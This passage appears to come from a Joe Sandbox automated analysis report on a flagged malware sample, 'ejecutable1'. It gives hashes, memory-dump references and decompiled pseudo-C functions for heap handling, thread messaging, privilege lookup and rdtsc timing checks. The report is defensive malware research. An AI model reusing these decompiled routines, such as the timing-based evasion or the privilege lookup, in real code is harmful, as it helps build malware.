                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008907AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E004088C0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t48;
				intOrPtr* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;

				_t50 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t50,  &_v24); // executed
				_t52 = _t51 + 8;
				if(_t24 != 0) {
					_t40 =  &_v840;
					E00407030( &_v24,  &_v840);
					_t53 = _t52 + 8;
					do {
						_push(0x104);
						_push( &_v284);
						E0041A0E0(_t40);
						_t40 =  &_v804;
						E0041A750( &_v284,  &_v804);
						_t54 = _t53 + 0x10;
						_t48 = 0x4f;
						while(1) {
							_t31 = E00413DE0(_t40, E00413D80(_t50, _t48),  &_v284);
							_t54 = _t54 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t48 = _t48 + 1;
							if(_t48 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t50 + 0x14; // 0xffffe1b5
						_t40 =  *_t9;
						 *(_t50 + 0x474) =  *(_t50 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t53 = _t54 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t50,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t50 + 0x55c)) =  *((intOrPtr*)(_t50 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t50 + 0x31)) =  *((intOrPtr*)(_t50 + 0x31)) + _t39;
					_t20 = _t50 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t50 + 0x32)) =  *((intOrPtr*)(_t50 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                    0x004088cb
                                                                    0x004088d3
                                                                    0x004088d5
                                                                    0x004088da
                                                                    0x004088df
                                                                    0x004088e7
                                                                    0x004088f2
                                                                    0x004088f7
                                                                    0x00408900
                                                                    0x00408906
                                                                    0x0040890b
                                                                    0x0040890c
                                                                    0x00408911
                                                                    0x0040891f
                                                                    0x00408924
                                                                    0x00408927
                                                                    0x00408930
                                                                    0x00408942
                                                                    0x00408947
                                                                    0x0040894c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040894e
                                                                    0x00408952
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408954
                                                                    0x00000000
                                                                    0x00408952
                                                                    0x00408956
                                                                    0x00408956
                                                                    0x00408959
                                                                    0x0040895f
                                                                    0x00408961
                                                                    0x0040896c
                                                                    0x00408971
                                                                    0x00408974
                                                                    0x00408981
                                                                    0x0040898c
                                                                    0x0040898e
                                                                    0x00408994
                                                                    0x00408998
                                                                    0x0040899b
                                                                    0x0040899b
                                                                    0x004089a2
                                                                    0x004089a5
                                                                    0x004089aa
                                                                    0x004089b7
                                                                    0x004088e6
                                                                    0x004088e6
                                                                    0x004088e6

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                    • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                                    • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                    • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418912, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 55%
                                                                    			E00418912(void* __eflags, intOrPtr _a4, int _a8, char _a12, long _a16, long _a20) {
				intOrPtr* __esi;
				void* __ebp;
				intOrPtr* _t8;
				intOrPtr* _t9;
				void* _t11;

				asm("in eax, 0x79");
				asm("movsd");
				_t9 = _t8;
				asm("enter 0x9c8, 0xb7");
				asm("int 0xdb");
				if(__eflags <= 0) {
					__ebp = __esp;
					__esi = _a4 + 0xc7c;
					ExitProcess(_a8);
				}
				asm("adc al, 0x9");
				 *_t9 =  *_t9 + _t9;
				_t3 =  &_a12; // 0x413526
				_t11 = RtlAllocateHeap( *_t3, _a16, _a20); // executed
				return _t11;
			}








                                                                    0x00418912
                                                                    0x00418914
                                                                    0x00418915
                                                                    0x00418916
                                                                    0x0041891a
                                                                    0x0041891e
                                                                    0x00418921
                                                                    0x00418932
                                                                    0x00418948
                                                                    0x00418948
                                                                    0x004188b8
                                                                    0x004188ba
                                                                    0x004188c2
                                                                    0x004188cd
                                                                    0x004188d1

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418948
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateExitHeapProcess
                                                                    • String ID: &5A
                                                                    • API String ID: 1054155344-1617645808
                                                                    • Opcode ID: 37ecb02be97ba8e4d2bd12a149df672563161c6d4ff55112c63d3ffac8f8a17c
                                                                    • Instruction ID: 66285f2fc44875e5db4a20446be51802aaa9e2d4a9bfaeee72af0747e4fade6c
                                                                    • Opcode Fuzzy Hash: 37ecb02be97ba8e4d2bd12a149df672563161c6d4ff55112c63d3ffac8f8a17c
                                                                    • Instruction Fuzzy Hash: AEF09AB6600208BFD710EF58CC85ED737A8AF99750F15806AFC185B302C635EA01CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 4188a0-4188d1 call 4191d0 RtlAllocateHeap
                                                                    C-Code - Quality: 79%
                                                                    			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				intOrPtr* _t8;
				void* _t10;
				void* _t15;

				_t8 = E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				asm("adc al, 0x9");
				 *_t8 =  *_t8 + _t8;
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}






                                                                    0x004188b7
                                                                    0x004188b8
                                                                    0x004188ba
                                                                    0x004188c2
                                                                    0x004188cd
                                                                    0x004188d1

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: &5A
                                                                    • API String ID: 1279760036-1617645808
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 245 407280-4072ca call 41a130 call 41ad10 call 409b30 call 413e40 255 4072cc-4072de PostThreadMessageW 245->255 256 4072fe-407302 245->256 257 4072e0-4072fa call 409290 255->257 258 4072fd 255->258 257->258 258->256
                                                                    C-Code - Quality: 22%
                                                                    			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t20;
				void* _t24;
				int _t25;
				void* _t28;
				void* _t30;

				_t28 = _t30;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B30(_t24, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = E00413E40();
				_t25 = _t13;
				if(_t25 == 0) {
					L5:
					return _t13;
				} else {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t38 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t25(_t20, 0x8003, _t28 + (E00409290(_t38, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
					goto L5;
				}
			}












                                                                    0x00407281
                                                                    0x0040728f
                                                                    0x00407293
                                                                    0x0040729e
                                                                    0x004072aa
                                                                    0x004072ae
                                                                    0x004072b3
                                                                    0x004072b8
                                                                    0x004072ba
                                                                    0x004072bc
                                                                    0x004072bd
                                                                    0x004072be
                                                                    0x004072c3
                                                                    0x004072ca
                                                                    0x004072fe
                                                                    0x00000000
                                                                    0x004072cc
                                                                    0x004072cd
                                                                    0x004072da
                                                                    0x004072dc
                                                                    0x004072de
                                                                    0x004072fb
                                                                    0x004072fb
                                                                    0x00000000
                                                                    0x004072fd

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                    • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                                    • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                    • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407253, Relevance: 1.6, APIs: 1, Instructions: 51threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 262 407253-40725e 263 407260-40727d call 419b10 call 4199c0 262->263 264 4072ba-4072ca call 413e40 262->264 270 4072cc-4072de PostThreadMessageW 264->270 271 4072fe-407302 264->271 273 4072e0-4072fa call 409290 270->273 274 4072fd 270->274 273->274 274->271
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 9e54817f19391d00a00881f6836d59e2f58509081dad8b49d9f9b9f8ab3c7a17
                                                                    • Instruction ID: e8dea1b8f6bfc86c1107b0ce92fb15778c1b62fe0449c354f1b69afb6a45d09c
                                                                    • Opcode Fuzzy Hash: 9e54817f19391d00a00881f6836d59e2f58509081dad8b49d9f9b9f8ab3c7a17
                                                                    • Instruction Fuzzy Hash: 04F04C72B4422535EA2165657C03FFE77489F01B21F1400BFFE04BA1C1EA996D0582E6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004188D5, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 302 4188d5-4188f7 call 4191d0 304 4188fc-418911 RtlFreeHeap 302->304
                                                                    C-Code - Quality: 82%
                                                                    			E004188D5(void* __eax, void* __ebx, intOrPtr __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				intOrPtr _v117;
				char _t15;
				void* _t24;

				asm("cmpsb");
				_v117 = __edx;
				_t12 = _a4;
				_t6 = _t12 + 0xc74; // 0xc74
				E004191D0(_t24, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}






                                                                    0x004188de
                                                                    0x004188df
                                                                    0x004188e3
                                                                    0x004188ef
                                                                    0x004188f7
                                                                    0x0041890d
                                                                    0x00418911

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 50d5c2fb33c6b13463172d66d8e747e98995cb8252e657dbf8bd246b6a7f65da
                                                                    • Instruction ID: 336e807a0a27f9dc3a48efef2e873fcfe1d90673f596eda69a50d6bce5fa4fcd
                                                                    • Opcode Fuzzy Hash: 50d5c2fb33c6b13463172d66d8e747e98995cb8252e657dbf8bd246b6a7f65da
                                                                    • Instruction Fuzzy Hash: E9E06D71200214BFDB28DF64CC49EEB77B8EF88350F044159F9089B251C630E850CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 4188e0-4188f6 306 4188fc-418911 RtlFreeHeap 305->306 307 4188f7 call 4191d0 305->307 307->306
                                                                    C-Code - Quality: 100%
                                                                    			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                    0x004188ef
                                                                    0x004188f7
                                                                    0x0041890d
                                                                    0x00418911

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 308 418a40-418a74 call 4191d0 LookupPrivilegeValueW
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                    0x00418923
                                                                    0x0041893a
                                                                    0x00418948

                                                                    APIs
                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418948
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418A31, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 4a55463700eac1f9e00d6d66ea600c39e02f8cfb1798a63af3fca7ff5500506b
                                                                    • Instruction ID: 5c19e4e4fa0be2c738f04f747abe7d4d9a78b3f36d75179b6f1f5b64f326046d
                                                                    • Opcode Fuzzy Hash: 4a55463700eac1f9e00d6d66ea600c39e02f8cfb1798a63af3fca7ff5500506b
                                                                    • Instruction Fuzzy Hash: 0BD05BB51041456BDB15EF95D8508EB3769EF852947048555FC4887246CA36D851C770
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 008A26F8, Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
